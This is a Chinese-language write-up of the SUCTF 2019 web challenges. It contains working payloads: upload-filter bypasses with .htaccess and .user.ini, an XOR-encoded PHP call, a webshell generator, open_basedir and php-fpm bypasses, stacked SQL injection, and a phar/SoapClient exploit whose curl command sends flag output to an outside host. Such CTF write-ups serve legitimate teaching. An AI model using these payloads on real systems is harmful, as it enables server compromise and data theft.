2019-SUCTF-web記錄

1.web1-chkin

首先發現服務器中間件為nginx，並且fuzz上傳過濾情況，是黑名單，帶ph的全部不能上傳切對文件內容中包含<?進行過濾，並且服務器對文件頭有exif_type的判斷，直接通過xbm格式繞過，傳.htaccess和.user.ini是可以的，又因為此題為nginx，所以通過.user.ini結合文件夾中已經有的index.php使其包含上傳的shell.png來getshell即可

2.web2-easyphp

做的時候思路也很明確，通過eval來調用get_the_flag函數，只需要異或出一個_GET即可，這里傻了剛開始一直以為異或得到字符串必須在url中通過'單引號或者雙引號來包含着這些可以用的字符，因為這些字符有特殊含義，所以瀏覽器解碼以后不能直接用，因為我fuzz異或字符時是以可打印字符為payload的，實際上這里要用到不可打印字符，這樣瀏覽器即使解碼也不會把其識別成有特殊含義的字符

上面是異或出來的可見字符，當然這些字符大多數有特殊含義，在瀏覽器端不能直接使用，要用的話也要讓單引號包含着，當作字符串，但是這里是沒有單引號或者雙引號的

所有可打印字符的ascii碼值為，只要是在這個范圍內的字符，全部都會被瀏覽器解碼為可見字符，因此可以在這個字符范圍內進行異或字符的fuzz

['61', '62', '63', '64', '65', '66', '67', '68', '69', '6a', '6b', '6c', '6d', '6e', '6f', '70', '71', '72', '73', '74', '75',
 '76', '77', '78', '79', '7a', '41', '42', '43', '44', '45', '46', '47', '48', '49', '4a', '4b', '4c', '4d', '4e', '4f', '50',
 '51', '52', '53', '54', '55', '56', '57', '58', '59', '5a']

上圖是fuzz出來的可以用的payload，可以看到可以用的payload，非常多，就拿第一個試試吧成功執行了phpinfo

payload為：

${%80%80%80%80^%df%c7%c5%d4}{%80}();&%80=phpinfo

fuzz異或的腳本如下所示：

import string
ee= string.printable
a= map(lambda x:x.encode("hex"),list(ee))
_=[] 
G=[] 
E=[]
T=[] 
print list(ee)
for i in range(256):
    for j in range(256):
        if (chr(i) not in list(ee)) & (chr(j) not in list(ee)):
            tem = i^j
            if chr(tem)=="_":
                temp=[]
                temp.append(str(hex(i)[2:])+"^"+str(hex(j))[2:])
                _.append(temp)
            if chr(tem)=="G":
                temp=[]
                temp.append(str(hex(i)[2:]) + "^" + str(hex(j))[2:])
                G.append(temp)
            if chr(tem)=="E":
                temp=[]
                temp.append(str(hex(i)[2:]) + "^" + str(hex(j))[2:])
                E.append(temp)
            if chr(tem)=="T":
                temp=[]
                temp.append(str(hex(i)[2:]) + "^" + str(hex(j))[2:])
                T.append(temp)
print _
print G
print E
print T

這里就可以執行get_the_flag函數了，就進入第二層

第二層是

function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
    if(!exif_imagetype($tmp_name)) die("^_^"); 
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

第二層和第一個題基本相似，ph全過濾，

但是可以上傳.htaccess,因此可以使用

#!/usr/bin/python3
# Description : create and bypass file upload filter with .htaccess
# Author : Thibaud Robin

# Will prove the file is a legit xbitmap file and the size is 1337x1337
#SIZE_HEADER = b"\n\n#define width 1337\n#define height 1337\n\n"

def generate_php_file(filename, script):
    phpfile = open(filename, 'wb') 
    phpfile.write(SIZE_HEADER)
    phpfile.write(script.encode('utf-16be'))
    

    phpfile.close()

def generate_htacess():
    htaccess = open('.htaccess', 'wb')
    htaccess.write(SIZE_HEADER)
    htaccess.write(b'AddType application/x-httpd-php .ppp\n')
    htaccess.write(b'php_value zend.multibyte 1\n')
    htaccess.write(b'php_value zend.detect_unicode 1\n')
    htaccess.write(b'php_value display_errors 1\n')

    htaccess.close()
        
generate_htacess()

generate_php_file("webshell.ppp", "<?php eval($_GET['cmd']); die(); ?>")

 拿到shell以后，這道題還有三種做法：

1.openbase_dir的限制，因此還要先繞過openbase_dir，

這里因為出題人disable_function的過濾不嚴，也可以通過

chdir('xxx');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/'));

來進行bypass列目錄，然后再跳一次進行讀取flag即可

2.直接通過繞過disable_dunction來進行繞過openbase_dir,這里出題人沒過率好

3.預期解是通過攻擊php-fpm的unix套接字來進行繞過openbase_dir和繞過disable_function,因為php-fpm通常就兩種運行模式，fast-cgi和unix套接字模式運行，所以這里可以直接用p神的腳本，更改一下php_value的值即可

 

需要將這個默認文件改為unix套接字的路徑

php7.2-fpm.sock默認在，unix:///run/php/php7.2-fpm.sock

但是0ctf中也出現過在其他目錄，如/var/run/php/下，

'PHP_VALUE': 'auto_prepend_file = php://input'+chr(0x0A)+'open_basedir = /',

3.easy_sql

這道題拿上我就直接嘗試的是短路型注入方式，length(database())={},根據返回1或者0來判斷邏輯，但是后面就遇到問題了，可以跑出來庫名為CTF，要跑表

但是限制了payload長度，因此沒法繼續注入去拿表名，並且from也是過濾了，還想過是不是可以直接猜測字段名通過substr(flag,1,1)這種來拿到flag，但是flag關鍵詞也被過濾了，猜測了幾個其它的字段也沒用

這里也嘗試過load_file,load_file('/flag')來嘗試，但是也沒反應，后面堆疊是可以查表查字段的，但是flag過濾了，prepare限制了sql語句的長度，也涼涼

這里把Flag字符串直接進行過濾了，強網杯也出過這種題，嘗試預編譯：

payload還沒輸完就報長度限制了，因此這種方法也不行

這里有隊伍掃出源碼了,.index.php.swp，我用dirsearch沒掃到，得換個工具再掃一次。。

過濾關鍵詞在這里

$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|fr om|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";  

查詢語句如上圖所示，可以看到是支持堆疊查詢的，感覺預期解應該是堆疊注入,然而並不是，是一個新的知識點

 預期解為：

1;set sql_mode=pipes_as_concat;select 1

即將||或邏輯轉為字符串連接，那么將會把任意傳遞的query內容和flag進行拼接返回

 

這題沒有過濾*，導致非預期很嚴重，*,1直接可以出flag。，如果過濾好的話，這道題估計還是得猜邏輯

和字符串或時前面為1則返回1，前面為0則返回0，變為pipes_as_concat以后||就成了連接符了，還是一個比較新的點。

 4.pytohnginx

看到題目第一眼立馬想到blackhat2019剛出來的這個unicode編碼的洞

這里之前不了解python的urllib.request.urlopen的截斷，這里不存在的目錄的話會直接截斷導致沒法讀取文件，我剛開始選擇是

那么轉化以后c/o，o這個文件夾肯定是不存在的，因此沒法讀取，urlopen打開文件夾進行目錄穿越時必須是存在的目錄

 

 比如上面這個app目錄是存在的，題目的nginx配置文件如下圖所示

這里有以下幾種解法：

1.直接通過轉換一個像c的字符，來進行讀文件，delta的exp就是利用unicode字符范圍來嘗試出可以使用的字符串

from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():
    for x in range(65536):
        uni=chr(x)
        url="http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
        except:
            pass
def getUrl(url):
    url = url
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return False
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False

if __name__=="__main__":
    get_unicode()

隨便選其中一個就可以，然后訪問：

可以看到此時達成的效果是相同的

2.第二種就是多轉為一個/，利用file://suctf.cc/usr/local/nginx/conf/nginx.conf先讀nginx的配置文件，然后可以看到flag的位置在/usr/fffffflag，然后再讀flag即可，這里不要移位nginx的配置文

件只是為/etc/nginx/nginx.conf，剛開始我不知道urlopen不存在的目錄會截斷==

3.利用file:////suctf.cc/etc/passwd來繞過,那么urlparse解析的時候將無法取到hostname

然后第二步將url分割，分割出來還是空，因此前兩個if判斷很容易bypass

經過第三步，此時finalurl和host都是滿足條件的，主要是還是因為前面urlspilt時去掉了中間的兩個//

然后進行任意文件讀取即可，這個也是非預期，感覺比較有意思

5.uoload labs

這道題開了一會給源碼了

其中index.php，限定了后綴，並且返回上傳路徑，對上傳文件內容檢測<?

func.php中，會對我們提交的文件地址進行訪問

並調用getMIME函數進行文件內容檢測，這里實際上猜也能猜到肯定這里存在phar反序列化，因為后面的admin.php限定了訪問的ip地址

因此這里自然想到考了很多次的SoapClient反序列化，那么恰好這個File類又存在__wakeup函數

因此在反序列化時將會通過反射類機制實現類的實例化，並且調用類對象的check的函數，這里我們可以通過$this->func=“SoapClient”，$this->file_name為new SoapClient(null,payload)中的payload傳入即可，並且調用不存在的check函數，從而發起soap請求，那么現在外層的思路已經清晰了，通過phar反序列化觸發soap請求，那么這里讀取文件的時候又進行了限制：

 

這里過濾了很多協議，phar://，conpress.bzip2,conpress.zlib都過濾了

因此可以用：

php://filter/resource=phar://

來繞過過濾，從而來觸發phar反序列化，那么序列化鏈條已經好了，現在要構造內部數據，先貼一個exp(針對buu平台復現的，有所修改)：

<?php
system('rm -f 222.phar;rm -f *.gif');
$phar = new Phar('333.phar');
$phar->startBuffering();
$phar->addFromString('333.txt','text');
$phar->setStub('<script language="php">__HALT_COMPILER();</script>');

class File {
    public $file_name = "";
    public $func = "SoapClient";

    function __construct(){
        $target = "http://127.0.0.1/admin.php";
        $post_string = 'admin=1&cmd=curl --referer "`/readflag`" "http://xss.buuoj.cn/index.php?do=api%26id=qS1LKY"&clazz=SplStack&func1=push&func2=push&func3=push&arg1=123456&arg2=123456&arg3='. "\r\n";
        $headers = [];
        $this->file_name  = [
            null,
            array('location' => $target,
                  'user_agent'=> str_replace('^^', "\r\n", 'xxxxx^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'Content-Length: '. (string)strlen($post_string).'^^^^'.$post_string),
                  'uri'=>'hello')
        ];
    }
}
$object = new File;
echo urlencode(serialize($object));
$phar->setMetadata($object);
$phar->stopBuffering();
system('mv 222.phar 222.gif');

 首先soap的內部數據，主要是訪問admin.php時需要post過去的數據

這里調用將傳遞到admin.php的參數進行實例化了AD類，在這個類中，又通過反射類來實例一個對象，並通過該實例化的對象來調用反射出來的該類的方法，因此只要滿足傳遞過去的clazz類存在並且傳給該類的函數的參數可以為一個就行,這里可以直接用splstack類，就是php語言實現的一個棧數據類型的類，我們只需要隨便調用其中一個方法即可，比如push方法，將數據壓入棧中。

clazz=SplStack&func1=push&func2=push&func3=push&arg1=123456&arg2=123456&arg3=

即這一個部分就可以構造好了，在用buuoj的平台測試的時候要注意cmd參數要適當轉義

curl --referer "`/readflag`" "http://xss.buuoj.cn/index.php?do=api%26id=qS1LKY"

這里一個部分要將&換為%26,防止命令行下將&識別為命令鏈接符號，比如ls & id，將執行兩條命令，這里還要注意題目中對要讀取的文件內容進行了一個過濾<?,那么在phar的stub中，也就是標志phar包的標志中：

$phar->setStub("GIF89aphp __HALT_COMPILER(); ?>"); //設置stub

所以只需要保證后面的一部分結尾正確即可。

或者可以使用前面題目中的<script language="php">來繞過

接下來直接生成exp進行測試即可，又可以收到flag了

然而這個不是預期解，預期解是：

$m = new mysqli();
$m->init(); 
$m->real_connect('ip','數據庫賬號','數據庫密碼','數據庫',3306); 
$m->query('select 1;')//執行的sql語句

實際上是與下圖的check函數是對應起來的

這樣結合在vps搭建一個rouge mysql服務器就能夠對客戶端文件進行讀取了，那么沒設計好的是__destruct函數，這個析構函數在程序執行結束后也會執行一次，zedd師傅在后面也改成了__wakeup函數

 正常情況下不執行__wakeup()

 只有反序列化的時候會執行__wakeup（），然后執行__destruct()，然后程序運行結束銷毀對象，在執行一次__destruct函數

關於mysql 客戶端攻擊鏈接：

https://paper.seebug.org/998/